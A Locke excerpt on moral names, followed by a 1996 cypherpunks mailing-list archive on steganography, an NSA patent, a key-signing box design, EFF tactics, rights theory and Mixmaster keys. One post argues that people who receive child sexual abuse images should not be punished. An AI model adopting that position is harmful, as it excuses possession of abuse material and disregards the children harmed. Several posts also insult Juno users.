I confess, the change of the name, by the impropriety of speech, will at first disturb him who knows not what _idea_ it stands for; but as soon as the figure is drawn, the consequences and demonstrations are plain and clear.  

Just the same is it in _moral knowledge_:  let a man have the _idea_ of taking from others, without their consent, what their honest industry has possessed them of, and call this _justice_ if he please.  He that takes the name here without the _idea_ put to it will be mistaken, by joining another _idea_ of his own to that name;  but strip the _idea_ of that name or take it such as it is in the speaker's mind, and the same things will agree to it as if you called it _injustice_.

Indeed, wrong names in moral discourses breed usually more disorder, because they are not so easily rectified as in mathematics, where the figure once drawn and seen makes the name useless and of no force.  For what need of a sign, when the thing signified is present and in view?  

But in moral names, that cannot be so easily and shortly done, because of the many decompositions that go to the making up of the complex _ideas_ of those modes.  But yet for all this, the _miscalling_ of any of those _ideas_, contrary to the usual signification of the words of that language, hinders not but that we may have certain and demonstrative knowledge of their several agreements and disagreements, if we will carefully, as in mathematics, keep to the same precise _ideas_ and trace them in their several relations one to another, without being led away by their names.

If we but separate the _idea_ under consideration from the sign that stands for it, our knowledge goes equally on in the discovery of real truth and certainty, whatever sounds we make use of.

	~ An Essay Concerning Human Understanding
	   Chapter IV:  Of the Reality of Knowledge




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scrappo.reverb@juno.com (A L)
Date: Mon, 9 Sep 1996 10:33:59 +0800
To: cypherpunks@toad.com
Subject: Re: 9yrold
In-Reply-To: <19960908.125436.3318.0.Doom13@juno.com>
Message-ID: <19960908.165602.4527.1.scrappo.reverb@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 08 Sep 1996 14:44:40 EDT doom13@juno.com (Floyd W Odom) writes:
>Does anyone out there know any kids mailing lists, because my little 
>brother Richard just joined and he doesn't have anything to mail to 
>he's only 9 years old.
>
>
>
>floyd odom
This message has nothing to do with the subject of this mailing list,
which is as 
stated in the Information File which you should have read, Encryption and
other 
related issues. Your actions have been a nuisance, and you should cease
your 
message writing endeavor. In regards to your message, have him write
messages 
to you stating how he thinks you should stop writing to him, and how he
doesn't need
e-mail anyways.
~~~~~~~~~~~~~~~~~~~~
s/n ratio has been raised. Keep a tab on it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doom13@juno.com (Floyd W Odom)
Date: Mon, 9 Sep 1996 04:40:08 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19960908.123126.3118.1.Doom13@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone been on a bbs lately. I just subscribed to cypherpunks mailing
list.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Mon, 9 Sep 1996 07:38:45 +0800
To: "cypherpunks@toad.com>
Subject: RE: Encourage Singapore To Come Out Of the Stone Age
Message-ID: <01BB9D91.3EF3BB80@king1-22.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	James A. Donald, in reply to Enzo Michelangeli:

> Trying to build a free society by screaming loud
> what the "natural" rights are supposed to be, has no better chances of
> success than [...]

Succeeded the last two times it was tried.
........................................................................................


But it was not merely "screaming" about what the "natural" rights ought to be -

it was presenting a more definite and clear picture of them to the mind of the beholders (who hardly had any such ideas in their mind), as well as backing up the description of these rights with the intent to secure them through physical force, if necessary (as one might expect).

Screaming aloud about having "natural" rights and then sitting back and waiting for them to be recognized stands little or no chance of success with those who are obviously unsympathetic and are in a position of power over others.  Knowing what one is talking about, being able to convey it with the conviction of certainty, and being prepared to act to secure what it is "rightful" to have, is more likely to achieve the noble cause.

It's also more impressive (than whining).

   ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doom13@juno.com (Floyd W Odom)
Date: Mon, 9 Sep 1996 05:03:51 +0800
To: cypherpunks@toad.com
Subject: 9yrold
Message-ID: <19960908.125436.3318.0.Doom13@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone out there know any kids mailing lists, because my little
brother Richard just joined and he doesn't have anything to mail to he's
only 9 years old.



floyd odom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Mon, 9 Sep 1996 08:34:31 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: talker (fwd)
In-Reply-To: <199609082141.QAA03554@einstein>
Message-ID: <Pine.3.89.9609081530.A24737-0100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Sep 1996, Jim Choate wrote:

> 
> > Date: Sun, 8 Sep 1996 13:23:06 -0700 (PDT)
> > From: "Z.B." <zachb@netcom.com>
> > Subject: Re: talker
> > 
> > I just checked www.juno.com to see what kind of system they have, and it 
> > appears that it is a free email service.  No charges at all.  No wonder 
> > we get so many idiots from there - free mail and they probably don't 
> > bother to verify the people they give service to, either.
> 
> Well we know at least one cpunk who is anti-anonymity....
> 
Pardon me, but I don't recall writing that when I wrote this message.


---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Mon, 9 Sep 1996 05:15:53 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: What the NSA is patenting
In-Reply-To: <84215235509971@cs26.cs.auckland.ac.nz>
Message-ID: <Pine.BSI.3.91.960908150209.10432B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 8 Sep 1996 pgut001@cs.auckland.ac.nz wrote:

> >I'm sure there's going to be a REALLY marketable device out of this to get 
> >royalties off of.
>  
> No, the market for the more mainstream MFM's is small (a few K devices), for 
> MFSTM's it's even smaller (a few dozen?).  MFSTM's are usually built by 

You obviously did NOT detect my sarcasm about the previous subject.  :)

-Millie, who was trying to say that patenting such a device is patently 
stupid




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sun, 8 Sep 1996 13:37:57 +0800
To: schneier@counterpane.com
Subject: Re: What the NSA is patenting
Message-ID: <84215235509971@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


>>>United States Patent                   Patent Number:  5264794
>>>                                       Date of Patent: 23 Nov 1993
>>>
>>>Method of measuring magnetic fields on magnetically recorded media using a
>>>scanning tunneling microscope and magnetic probe
 
>>techology isn't much different from what's publicly available), in this case
>>all they were doing was protecting their investment (just like the various PKC
>>patents originally assigned to universities).
 
>I'm sure there's going to be a REALLY marketable device out of this to get 
>royalties off of.
 
No, the market for the more mainstream MFM's is small (a few K devices), for 
MFSTM's it's even smaller (a few dozen?).  MFSTM's are usually built by 
universities for research purposes, which means the patent won't affect them.  
As I said before, it's purely a "we paid for the research, we want some paper 
to wave around to justify the cost" thing.
 
>Question: if we pay taxes, then we pay for the research. if we pay for the 
>research, we should be able to see the results, just like shareholders in a 
>company.
 
You can see the results, just read the Journal of Applied Physics or IEEE 
Transactions on Magnetics.
 
I know people like to come up with conspiracy theories about the NSA, but this 
patent won't work as the basis for one.
 
Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blak Dayz <102540.2453@compuserve.com>
Date: Mon, 9 Sep 1996 07:21:17 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Kiddie porn on the Internet
Message-ID: <960908191449_102540.2453_HHV35-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


	I believe that you have a valid p.o.v on this subject on that:
1.  The Save Our Children, kill the kiddie porn, will have trouble being
enforced due to the large amounts of encryption and safe IRC fserves. If they
really wanted to enforce the Kill The Porn, then they should target the adults
by child pyschologist visits with the children during school hours.

2. The suspicion of the private organization "extortion" has valid backing in
that several coincidences have occured such as the one with Dennys. If a person
would research the matter further they would come upon several cases. 

*** The recievers of the porn should not be punished for the photographers
action, the same as if I would complain that someone burglarized my home becuase
i left the door open. It was their ignorance that caused their loss. 

Blak Dayz of the DAS
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Vagner <jlv@signet.sig.bsh.com>
Date: Mon, 9 Sep 1996 06:49:51 +0800
To: cypherpunks@toad.com
Subject: Photoshop, Steganograhy, and cypherpunks?
In-Reply-To: <199609070003.TAA11985@pentagon.io.com>
Message-ID: <Pine.SGI.3.95.960908160931.19582B-100000@www>
MIME-Version: 1.0
Content-Type: text/plain



> > 1) If I hide some PGP encrypted data in a
> > gif, jpg or wav file will there be any tell tale 
> > signs to the naked eye of an expert? If yes,
> > what are they?
> 
> If you stego too many bits in a figure, it may become apparent.

The new version of Photoshop coming out this fall includes the ability to
embed "digital watermarking":

(from http://www.news.com/News/Item/0,4,3188,00.html: 

                Digital watermarking
                adds copyright information to
                a photograph that doesn't alter the photo's
                appearance. The watermark is detectable even
                after the photo is edited or printed and rescanned. 

Question: Will stegonagrphying (?) the picture with noise mar the
watermark? Will a digital signature *and* something embedded into the
graphic through steganography seriosly affect a 24-bit image?

Furthermore: What about browsers? Could cookies or binary info be embedded
into images on the fly so that a java applet could preserve information or
states between pages, of different sites?

Just thoughts..

Jason Vagner





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 9 Sep 1996 10:23:50 +0800
To: "attila" <whallen@capitalnet.com>
Subject: Re: talker
Message-ID: <19960908232414750.AAA81@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 08 Sep 1996 11:09:07 -0400, Wayne H. Allen wrote:

>>        cypherpunks are *not* crackers; this is a crytographic 
>>    and political issues relating to cryptography mailing list. 

>    Well maybe, political issues galore certainly, but very very little
>to do with cryptography. I mean what does TWA 800 have to do with this
>list. I mean lets be completely honest here, whatever the original 
>purpose of the list was for its been allowed to shift away from its
>intended purpose considerably.

True, but something like TWA800 has a lot more relevency to the "political
issues" part mentioned above.  A Big-Brother database being setup seems
on-topic...

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 9 Sep 1996 10:18:34 +0800
To: "Chris Adams" <roger@coelacanth.com>
Subject: Re: talker
Message-ID: <19960908232620265.AAA85@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 07 Sep 1996 20:10:50 -0700, James A. Donald wrote:

>> Yup -- you're never going to see a very high SNR out of Juno:
>
>Yes, the anarchy list has a persistent moron from Juno.com, educated 
>well above his intelligence.   A seriously proflic loon.
>
>I have told eudora to transfer everything from juno.com into my
>loon file, regardless of author.  Makes AOL.com look like
>caltech.

Particularly since AOL tends to get a lot of well-educated people who are just
net-illiterate.   Of course, they also get a bunch of cranks, particularly
since those "Generate an AOL account" programs started going around...

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 9 Sep 1996 09:53:37 +0800
To: "jlv@signet.sig.bsh.com>
Subject: Re: Photoshop, Steganograhy, and cypherpunks?
Message-ID: <19960908233159843.AAA224@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Sep 1996 16:16:58 -0400 (EDT), Jason Vagner wrote:


>> > 1) If I hide some PGP encrypted data in a
>> > gif, jpg or wav file will there be any tell tale 
>> > signs to the naked eye of an expert? If yes,
>> > what are they?
>> If you stego too many bits in a figure, it may become apparent.

>The new version of Photoshop coming out this fall includes the ability to
>embed "digital watermarking":

>(from http://www.news.com/News/Item/0,4,3188,00.html: 
>
>                Digital watermarking
>                adds copyright information to
>                a photograph that doesn't alter the photo's
>                appearance. The watermark is detectable even
>                after the photo is edited or printed and rescanned. 
>
>Question: Will stegonagrphying (?) the picture with noise mar the
>watermark? Will a digital signature *and* something embedded into the
>graphic through steganography seriosly affect a 24-bit image?

Most certainly; the idea here is that watermarking should show that an image is
unedited.

>Furthermore: What about browsers? Could cookies or binary info be embedded
>into images on the fly so that a java applet could preserve information or
>states between pages, of different sites?

Of course. You could do a cookie type implementation with a Java applet easily.

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Webeus <webeus@sprynet.com>
Date: Mon, 9 Sep 1996 10:40:32 +0800
To: cypherpunks@toad.com
Subject: Mailing list
Message-ID: <323357CF.28F0@sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

I have been away for over 2 months and in returning find that
alpha.c2.org is lo longer.

Can you suggest an alternative, FAQ's etc ?? 

Thank you

Webeus




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 9 Sep 1996 10:26:01 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Far-reaching tentacles . . . ?
Message-ID: <199609082338.QAA18544@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Found in the news:


	(SACRAMENTO)- The principals of six Sacramento area schools have  
received 46 used computers that were renovated by inmates at Folsom 
Prison. Warden Theo White delivered the machines after they were given a 
reprieve from the scrap heap. The prison obtained the donated personal 
computers from the non-profit Detwiler Foundation... which began working 
five years ago to bring new technology into the state's classrooms. 

[Would you want *YOUR* CHILDREN to use computers that had been HACKED
by CONVICTED CRIMINALS????]

-- 
Alan Bostick               | Usenet is living proof that if you analyze a
mailto:abostick@netcom.com | blackbody spectrum for semantic content you get
news:alt.grelb             | "Call 1-800-HOT-GIRL now!"
http://www.alumni.caltech.edu/~abostick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Sep 1996 07:32:23 +0800
To: cypherpunks@toad.com
Subject: Re: talker (fwd)
Message-ID: <199609082141.QAA03554@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 8 Sep 1996 13:23:06 -0700 (PDT)
> From: "Z.B." <zachb@netcom.com>
> Subject: Re: talker
> 
> I just checked www.juno.com to see what kind of system they have, and it 
> appears that it is a free email service.  No charges at all.  No wonder 
> we get so many idiots from there - free mail and they probably don't 
> bother to verify the people they give service to, either.

Well we know at least one cpunk who is anti-anonymity....

                                                      Jim Choate
                                                      
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Mon, 9 Sep 1996 08:33:21 +0800
To: varange@crl.com (Troy Varange)
Subject: Re: What the NSA is patenting
In-Reply-To: <199609080449.AA28514@crl11.crl.com>
Message-ID: <199609082159.QAA13284@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Burning the floppy would seem to solve the problem.  Lock sensitive
> data in RAM away from disks except for burnable floppies.  I guess
> linux can be configured to keep sensitive data in a RAM filesystem,
> keeping it from being synced or flushed.
> 

Currently, I am hacking up a prototype of an armored keysigning box using
an old 386.

This box signs/decodes incoming E-mail as long as the key switch is in the
correct position.  The key remains in /dev/ram0, and is encrypted, as well
as stored in a .au file.  For one of the keys, I am using a hacked des
program that reads a file off a floppy for the TDES key before copying the
PGP key into the ramdrive.

What I plan to do is write software so that multiple floppies are needed
to load the key into the RAM filesystem, and to "lock" the machine.

After the key is loaded, all network daemons are killed except smail, and
all gettys are killed.  This makes it hard for someone locally to get to
the RAM drive.  If the box is rebooted, or turned off -- bye bye RAM
drive.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 9 Sep 1996 10:59:49 +0800
To: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <199609082348.TAA04495@yakko.cs.wmich.edu>
Message-ID: <Pine.SUN.3.91.960908171220.9904E-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


No. A customer buys service from AOL and in doing so signs a contract 
with the company. AOL and the customer each has certain rights and 
obligations spelled out in the contract.

I confess I don't know if AOL's contract allows them to block spam. But 
in any case, spammers are not customers.

-Declan


CONTRACT - LEGAL DEFINITION

A contract, expressed or implied, is binding when six elements are present:

1.	Parties involved have the capacity to enter into a contract, i.e. 
mental capacity and requisite age, or the authority to obligate the 
institution.

2.	The contract must be based on an offer.

3.	The offer must be accepted (acceptance by a written or oral 
promise - expressed acceptance, or by performance of the task in question 
implied acceptance.

4.	The offer and acceptance must be mutual.  The key here is proof 
of a "meeting of the minds" on terms and nature of the promise.

5.	There must be performance in order for one or both parties to be 
bound by the mutually agreed terms of the contract.  (An institution 
would not be obligated to pay until the contractor performed services 
agreed upon).

6.	The contract must be for a legal purpose or it will not be binding.




On Sun, 8 Sep 1996, Damaged Justice wrote:

> > 
> > The judge did mention "status quo" in his opinion. I would hope that 
> > "status quo" would mean the ability of ISPs to offer and enforce whatever 
> > contracts they want -- including banning incoming spam -- without the 
> > intervention of the government. Unless, of course, the ISP breaks the 
> > contract, but in that case the plaintiffs should be the customers, not 
> > the spammer.
> 
> Aren't spammers customers, by definition? If so, they have just as much
> right to bring suit as any other customer. Less moral justification, yes,
> but an equal standing in the law's eyes.
> 
> --
> I let go of the law, and people become honest / I let go of economics, and
> people become prosperous / I let go of religion, and people become serene /
> I let go of all desire for the common good, and the good becomes common as
> grass.   .oOo.    [Tao Te Ching, Chapter 57, Stephen Mitchell translation]
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 8 Sep 1996 18:02:35 +0800
To: strombrg@hydra.acs.uci.edu (Dan Stromberg)
Subject: Re: LACC: Re: What is the EFF doing exactly?
In-Reply-To: <32303FDA.493B@hydra.acs.uci.edu>
Message-ID: <199609080749.RAA01948@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> Julian Assange wrote:
> > Certain members of the EFF board seem to be politically naive. The
> > rational, intelligent lobbyist will always see both sides of the
> > argument.  Presenting both sides of the argument to the world at large
> > is another matter altogether. You should only present both sides of the
> > argument to the inner policy tactics personnel only in order to formulate
> > policy and create defences for the weaknesses in your position. To the
> > outside world only ever sees a united front. This is basic politics.
> 
> This is certainly the way most people in political roles handle things,
> and it is certainly an effective way of handling simple-minded people.
> 
> However, it is one thing I find very difficult to respect.

Respect or not, if your team is small and the field is large, and
everyone else is playing gridiron, then don't expect to prove anything
but your stupidity by playing cricket.

> How many of the world's stupid policies have been enacted, because
> someone decided to present only one side of an issue, realized it was
> "the wrong side", and felt they couldn't later change their mind for the
> better - because they presented the issue as overly black-and-white
> initially?

I agree, however you are confusing large parties, so dominant as to form
government and policy at whim with those that represent a particular
cause or interest group. The EFF falls into the latter category. Its
goals are relatively narrow, its membership tiny.  Such a small group,
fighting under-resourced battle against powerful, conservative interests
does not need, and should not espouse the arguments of those who seek to
destroy it. When Canoing up a waterful, one does not need to paddle
backwards 50% of the time in order to be "fair".

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 9 Sep 1996 10:51:54 +0800
To: "Z.B." <zachb@netcom.com>
Subject: Re: talker
In-Reply-To: <Pine.3.89.9609081353.A27184-0100000@netcom10>
Message-ID: <Pine.BSF.3.91.960908185022.331A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Complaints about spamming and cross-posting probably won't get you far, 
either. On-Net spamvertizing seems to be their source of revenue. Perhaps 
shaw.net needs to be contacted instead. It's either that, or give Floyd 
and Richard a nickle to go watch batman instead of playing with the computer.

- r.w.


On Sun, 8 Sep 1996, Z.B. wrote:

> On Sat, 7 Sep 1996, James A. Donald wrote:
> 
> > At 12:26 PM 9/8/96 -0500, Roger Williams wrote:
> > > Yup -- you're never going to see a very high SNR out of Juno:
> > 
> > Yes, the anarchy list has a persistent moron from Juno.com, educated 
> > well above his intelligence.   A seriously proflic loon.
> > 
> > I have told eudora to transfer everything from juno.com into my
> > loon file, regardless of author.  Makes AOL.com look like
> > caltech.
> 
> I just checked www.juno.com to see what kind of system they have, and it 
> appears that it is a free email service.  No charges at all.  No wonder 
> we get so many idiots from there - free mail and they probably don't 
> bother to verify the people they give service to, either.
> 
> 
> ---
> 
> Zach Babayco
> 
> zachb@netcom.com  <----- finger for PGP public key
> http://www.geocities.com/SiliconValley/Park/4127
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Mon, 9 Sep 1996 09:34:40 +0800
To: gbroiles@netbox.com
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <2.2.32.19960908032421.007004c0@mail.io.com>
Message-ID: <9609082254.AA26712@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>Either that, or the fear that authorities are no longer necessary unless
>they can point to something dangerous that they're protecting the rest of us
>from - with the plausibility of the Godless Communist Threat waning, it
>becomes necessary for drug sellers and people with fringe politics to appear
>more threatening.

I don't think the same case can be made for the drug sellers and
militias providing a political justification for the military
industrial complex in the same way the USSR did. It is
true that the USSR was always a more credible threat to hawks
in the pentagon than to people who analysed the situation, many 
of whom realised that the USSR was facing a terminal crisis
before Afghanistan. Even so I don't think that the drug or millitia
threat could every be hyped to a level which would justify huge
subsidies to Boeing, McDonnald-Douglas, Ratheon etc.


>Can you
>imagine the military spontaneously downsizing, or failing to oppose
>reductions in force? 

Its interesting that none of the candidates in the current election
are willing to address the question of whether the US really needs
to maintain the military budget at its cold war levels even after
the alledged threat has collapsed. Indeed the Republicans are 
suggesting spending several billion on building an anti-ballistic
missile system when none of the alledged "threats" has a ballistic
missile with appropriate range in the first place. The likely nuclear
scenario is for someone to smuggle a bomb in in a truck.


>While domestic terrorist events may bring a sharper focus to discussions of
>the merits and costs of politically motivated violence, your fantasy that it
>will somehow bring about a change in someone's substantive politics is
>amusing.

US contributions to NORAID dropped by a half in the wake of the 
Lockerbie incident. Its difficult to make any conclusions about the
current drop in funding since they might be due to the peace process,
domestic terrorism or both. 

>Further, your notion that "terrorism" has somehow been limited to "far-off
>irredentist struggles" of concern only to expatriates is ridiculous. Have
>you not noticed the arson, bombings, and shootings at abortion clinics in
>the US? Or the history of violence on the (neo-) left, e.g., the Weather
>Underground, etc.? Or the history of the KKK and race-motivated
>lynchings/beatings? Or the Unabomber? 

With the possible exception of the activities of the KKK I don't think
you make your case. The KKK explicitly persued a strategy of terror 
to create a political effect through intimidation. The Unabomber was
probably just a crank for whom the political ideology was merely an
excuse to indulge in psychopathic behaviour, in the absence of a
political motive another would have been found. While this supports
my general comment that terrorism in general is caused by psychopaths 
rather than people with legitimate grievances I don't think
that the Unabomber fits the normal profile. He was a single individual,
not a group. 

>Isn't it wonderful that "one" unavoidably "reaches conclusions" which
>eliminate moral and political arguments you find uninteresting? 

I don't find the arguments themselves uninteresting. I just find the
mode of argument superficial. If people are arguing in terms of "rights"
but cannot justify why something is a "right" then they are simply
promoting their conclusions to axioms, its begging the question. The
argument is uninteresting because it is not an argument, it is merely
a restatement of the original claim. Arguing the right to bear arms on
the basis of the right to bear arms is not an interesting "argument".

>Boy, if we could just figure out the right combination of procedural rules,
>we could simply abandon all of this problematic "rights" stuff. Wouldn't
>that be a lot simpler? These pesky "rights" keep getting in the way of
>legitimate government needs. Shit.

If you read Mill's "On Liberty" you will find that he is very clear that
rights are the consequence of a social/governmental process and that it
is not possible to talk of "rights" outside the context of laws. 

The difficult philosophical questions of "rights" is recognising when
there is a conflict between rights and deciding which right to
favour over another. I assert that every child has a right to food,
shelter and education, I do so by recourse to a Utilitarian argument
but I could equally well ground my argument in terms of 
Contractarianism or use a Kantian argument. Now if you assert that
the right of the individual to opt out of society and not pay taxes
is paramount this creates a problem, how is the conflict between 
the right I propose and the right you propose resolved?

>Don't forget that it's necessary to adopt an exaggerated version of your own
>position, such that you can "compromise" your way to "agreeing" on exactly
>what you wanted in the first place.

No, that is not necessarily the case. It is usualy usefull to set out
a bargaining position that is maximalist and to avoid being more
reasonable than the opposition. But to stake out a completely extreeme 
position means that the conclusion may be reached that agreement is not 
possible at all and that consequently there is no purpose in negotiation.

In order for the pro/anti-abortion camps to become entrenched in the
political process in the manner they have it was necessary for the
anti-abortion people to deliver the Republican party a block vote of 
about 2 million voters through the Christian Coalition. Its only
possible to take an absolutist position if you can deliver a well 
defined voting block. The Internet cannot currently deliver such a 
vote.


		Phill




















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alexander 'Sasha' Chislenko" <sasha1@netcom.com>
Date: Mon, 9 Sep 1996 10:31:22 +0800
To: cypherpunks@toad.com
Subject: Re: Imminent Death of the Internet, GIF at 11
Message-ID: <2.2.32.19960908231147.0129c1fc@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:40 AM 9/7/96 -0700, Martin Minow <minow@apple.com> wrote:

>For several months (years?) Bob Metcalf has been predicting that
>the Internet will self-destruct from overload. His argument
>appears to follow one of Gordon Bell's maxims: "anyone can predict
>the future: all you need is semi-log paper and a ruler." As I
>understand it, Metcalf's argument is that network load (messages,
>packets) is growing exponentially, while network bandwidth (fiber
>capacity, switch performance) is growing linearly. At some point,
>these two curves cross -- and demand will exceed capacity.
>

 I would add one word into that Gordon Bell's maxim: "anyone can predict
the SHORT-TERM future: all you need is semi-log paper and a ruler."

 Rulers are liner-extrapolation predictors; the only predictions with
still lower intelligence are pointers - with the assumption that things
are going to always remain the same. Unfortunately, these two kinds of
prediction methods populate most of the human "visionary" landscape,
with rare flowers of visionary minds elevating above it - Metcalf's
doesn't seem to be one of them.  This very observation on the
population/food dilemma was made by Malthus quite a while ago.
However, both population and food are still here, and natural resources
are no longer a serious limiting factor for the production of food.

  If you notice that your attempt to extend your ruler farther than
it can go, will not work, it's a good prediction of a breakdown -
*of the ruler*, not the system you are trying to measure.  The role
of a visionary is not to mistake the horizon of current trends for the
horizon of the world, but look ahead and predict future trends - and
advise what should be done to adapt to the imminent transitions.

  An important observation for the net traffic/bandwidth "crisis" is
that human ability to perceive textual and visual information remains
pretty much the same.  Addition of graphics, video and sound to the Net,
as well as the growing number of users, increase the bandwidth, but
this all has (though still distant) saturation point - say, 24 hour-a-day
single-channel video feed to every human and his dog. (Inter-machine
communications do not have this limit though).

  Already, most of the newsfeed coming to any single server, is never
read by anybody; this is also the fate of most messages from 60 or so
mailing lists coming to my PC.  A solution here, that will be also
quite instrumental for many future problems, is not to send messages
that are not going to be read - i.e., server-side filtering agents;
I have been suggesting collaborative message filtering (see proposal
on my home page) for more than 5 years now - only to find people who
could help implement it, uselessly running around the Net whining
and waving their stiff rulers.

Of course, there are also other methods of making Net traffic more
intelligent and robust; if Internet was recognized as the most
revolutionary development in the evolution of the global ecology of
intelligence, and if there existed some mechanism for turning truly
visionary ideas on the Net's evolution into changes in its structure,
then, well, things would be much better.
<x-rich></x-rich><x-rich>

----------------------------------------------------------------------------

Alexander Chislenko <<sasha1@netcom.com>     www.lucifer.com/~sasha/home.html

Firefly Network, Inc.: <<alexc@firefly.net>  www.ffly.com

----------------------------------------------------------------------------

</x-rich>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 9 Sep 1996 09:08:34 +0800
To: loki@infonex.com
Subject: Re: forward secrecy in mixmaster
In-Reply-To: <v03007803ae5817d08aba@[206.170.115.3]>
Message-ID: <199609081829.TAA00310@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Lance Cottrell <loki@infonex.com> writes on several lists:
> >I wrote the socket stuff yesterday evening, didn't take too long as
> >socket programming is something I've done lots of.
> >
> >Now comes what do you actually send down the sockets.
> >
> >Question for Lance, and any others who were involved in mixmasters
> >implementation: what did you have in mind as a way of negotiating the
> >DH keys?
> >
> >I notice that mixmaster generates a DH key and stores it in file
> >`DH.mix', but that this is not (as far as I can see from the source)
> >included in the remailers public key block.
> 
> No, it is not in the key block. It would be passed during the negotiation.

Well the first DH parameter set (in a series of re-keyed DH
parameters) could just as easily go in the public key block.  If you
